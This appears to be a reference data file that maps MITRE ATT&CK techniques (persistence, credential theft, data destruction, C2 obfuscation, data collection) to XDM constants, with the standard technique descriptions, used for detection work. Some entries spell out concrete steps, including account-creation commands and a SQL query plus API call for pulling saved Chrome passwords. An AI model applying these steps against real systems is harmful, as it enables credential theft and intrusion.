T1136.001 XDM_CONST.MITRE_TECHNIQUE_CREATE_ACCOUNT_LOCAL_ACCOUNT Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. https://attack.mitre.org/techniques/T1136/001
T1543 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters. (Citation: AppleDocs Launch Agent Daemons) Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection) https://attack.mitre.org/techniques/T1543
T1543.001 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS_LAUNCH_AGENT Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents. (Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware)(Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments, and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time. (Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks. Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command. Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true. (Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions. (Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) https://attack.mitre.org/techniques/T1543/001
T1543.004 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS_LAUNCH_DAEMON Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemon parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks. (Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists) Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions. (Citation: WireLurker)(Citation: OSX Malware Detection) Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon plist files. (Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019) https://attack.mitre.org/techniques/T1543/004
T1543.002 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS_SYSTEMD_SERVICE Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources. (Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems. Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a service is started manually by 'systemctl' or on system start if the service is set to automatically start.
* ExecReload directive covers when a service restarts.
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot. (Citation: Anomali Rocke March 2019) While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence. (Citation: Rapid7 Service Persistence 22JUNE2016) https://attack.mitre.org/techniques/T1543/002
T1543.003 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS_WINDOWS_SERVICE Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. (Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system. An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). https://attack.mitre.org/techniques/T1543/003
T1555 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users to manage and maintain them. Once credentials are obtained, they can be used to perform lateral movement and access restricted information. https://attack.mitre.org/techniques/T1555
T1555.003 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_CREDENTIALS_FROM_WEB_BROWSERS Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data, and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim's cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018) Adversaries have executed similar procedures for common web browsers such as Firefox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004). Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials. (Citation: GitHub Mimikittenz July 2016) After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). https://attack.mitre.org/techniques/T1555/003
T1555.001 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_KEYCHAIN Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user's logon credentials. https://attack.mitre.org/techniques/T1555/001
T1555.005 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_PASSWORD_MANAGERS Adversaries may acquire user credentials from third-party password managers. (Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk. (Citation: ise Password Manager February 2019) Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory. (Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212). (Citation: NVD CVE-2019-3610) Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager. (Citation: Cyberreason Anchor December 2019) https://attack.mitre.org/techniques/T1555/005
T1555.002 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_SECURITYD_MEMORY An adversary may obtain root access (allowing them to read securityd's memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user's logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain)(Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple's keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple's securityd utility takes the user's logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user's password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password. (Citation: OS X Keychain) https://attack.mitre.org/techniques/T1555/002
T1555.004 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_WINDOWS_CREDENTIAL_MANAGER Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults). (Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker) The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker. Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials. (Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault) Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager. (Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager. (Citation: Malwarebytes The Windows Vault) https://attack.mitre.org/techniques/T1555/004
T1485 XDM_CONST.MITRE_TECHNIQUE_DATA_DESTRUCTION Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure. Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018). In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) https://attack.mitre.org/techniques/T1485
T1132 XDM_CONST.MITRE_TECHNIQUE_DATA_ENCODING Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip. https://attack.mitre.org/techniques/T1132
T1132.002 XDM_CONST.MITRE_TECHNIQUE_DATA_ENCODING_NON_STANDARD_ENCODING Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) https://attack.mitre.org/techniques/T1132/002
T1132.001 XDM_CONST.MITRE_TECHNIQUE_DATA_ENCODING_STANDARD_ENCODING Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip. https://attack.mitre.org/techniques/T1132/001
T1486 XDM_CONST.MITRE_TECHNIQUE_DATA_ENCRYPTED_FOR_IMPACT Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) https://attack.mitre.org/techniques/T1486
T1565 XDM_CONST.MITRE_TECHNIQUE_DATA_MANIPULATION Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. https://attack.mitre.org/techniques/T1565
T1565.003 XDM_CONST.MITRE_TECHNIQUE_DATA_MANIPULATION_RUNTIME_DATA_MANIPULATION Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. https://attack.mitre.org/techniques/T1565/003
T1565.001 XDM_CONST.MITRE_TECHNIQUE_DATA_MANIPULATION_STORED_DATA_MANIPULATION Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. https://attack.mitre.org/techniques/T1565/001
T1565.002 XDM_CONST.MITRE_TECHNIQUE_DATA_MANIPULATION_TRANSMITTED_DATA_MANIPULATION Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. https://attack.mitre.org/techniques/T1565/002
T1001 XDM_CONST.MITRE_TECHNIQUE_DATA_OBFUSCATION Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. https://attack.mitre.org/techniques/T1001
T1001.001 XDM_CONST.MITRE_TECHNIQUE_DATA_OBFUSCATION_JUNK_DATA Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. https://attack.mitre.org/techniques/T1001/001
T1001.003 XDM_CONST.MITRE_TECHNIQUE_DATA_OBFUSCATION_PROTOCOL_IMPERSONATION Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. https://attack.mitre.org/techniques/T1001/003
T1001.002 XDM_CONST.MITRE_TECHNIQUE_DATA_OBFUSCATION_STEGANOGRAPHY Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. https://attack.mitre.org/techniques/T1001/002
T1074 XDM_CONST.MITRE_TECHNIQUE_DATA_STAGED Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017) In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020) Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection. https://attack.mitre.org/techniques/T1074
T1074.001 XDM_CONST.MITRE_TECHNIQUE_DATA_STAGED_LOCAL_DATA_STAGING Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. https://attack.mitre.org/techniques/T1074/001
T1074.002 XDM_CONST.MITRE_TECHNIQUE_DATA_STAGED_REMOTE_DATA_STAGING Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020) By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection. https://attack.mitre.org/techniques/T1074/002
T1030 XDM_CONST.MITRE_TECHNIQUE_DATA_TRANSFER_SIZE_LIMITS An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts. https://attack.mitre.org/techniques/T1030
T1530 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_CLOUD_STORAGE_OBJECT Adversaries may access data objects from improperly secured cloud storage. Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. https://attack.mitre.org/techniques/T1530
T1602 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_CONFIGURATION_REPOSITORY Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices. Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017) https://attack.mitre.org/techniques/T1602
T1602.002 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_CONFIGURATION_REPOSITORY_NETWORK_DEVICE_CONFIGURATION_DUMP Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. https://attack.mitre.org/techniques/T1602/002
T1602.001 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_CONFIGURATION_REPOSITORY_SNMP Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP). The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details. Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) https://attack.mitre.org/techniques/T1602/001
T1213 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_INFORMATION_REPOSITORIES Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server. https://attack.mitre.org/techniques/T1213
T1213.003 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_INFORMATION_REPOSITORIES_CODE_REPOSITORIES Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) https://attack.mitre.org/techniques/T1213/003
T1213.001 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_INFORMATION_REPOSITORIES_CONFLUENCE Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources https://attack.mitre.org/techniques/T1213/001
T1213.002 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_INFORMATION_REPOSITORIES_SHAREPOINT Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources https://attack.mitre.org/techniques/T1213/002
T1005 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_LOCAL_SYSTEM Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. https://attack.mitre.org/techniques/T1005
T1039 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_NETWORK_SHARED_DRIVE Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. https://attack.mitre.org/techniques/T1039
